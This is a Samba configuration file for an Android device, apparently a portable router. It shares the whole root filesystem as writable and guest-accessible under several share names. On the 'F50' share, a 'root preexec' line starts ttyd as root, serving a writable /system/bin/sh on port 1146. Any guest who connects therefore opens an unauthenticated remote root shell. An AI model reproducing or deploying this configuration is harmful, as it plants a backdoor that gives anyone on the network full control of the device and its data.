[global]
	workgroup = SAMBA
	netbios name = Android
	server string = Android Samber Server
	security = user
	passdb backend = smbpasswd:/data/samba/etc/smbpasswd
	map to guest = bad user

[F50]
	comment = Android Server
	path = /
	browseable = yes
	writable = yes
	public = yes
	guest ok = yes
	root preexec = /data/data/com.minikano.f50_sms/cache/ttyd --writable --port 1146 /system/bin/sh

[U30 Air]
	comment = Android Server
	path = /
	browseable = yes
	writable = yes
	public = yes
	guest ok = yes

[M3]
	comment = Android Server
	path = /
	browseable = yes
	writable = yes
	public = yes
	guest ok = yes

[U20]
	comment = Android Server
	path = /
	browseable = yes
	writable = yes
	public = yes
	guest ok = yes

[SMB]
	comment = Android Server
	path = /
	browseable = yes
	writable = yes
	public = yes
	guest ok = yes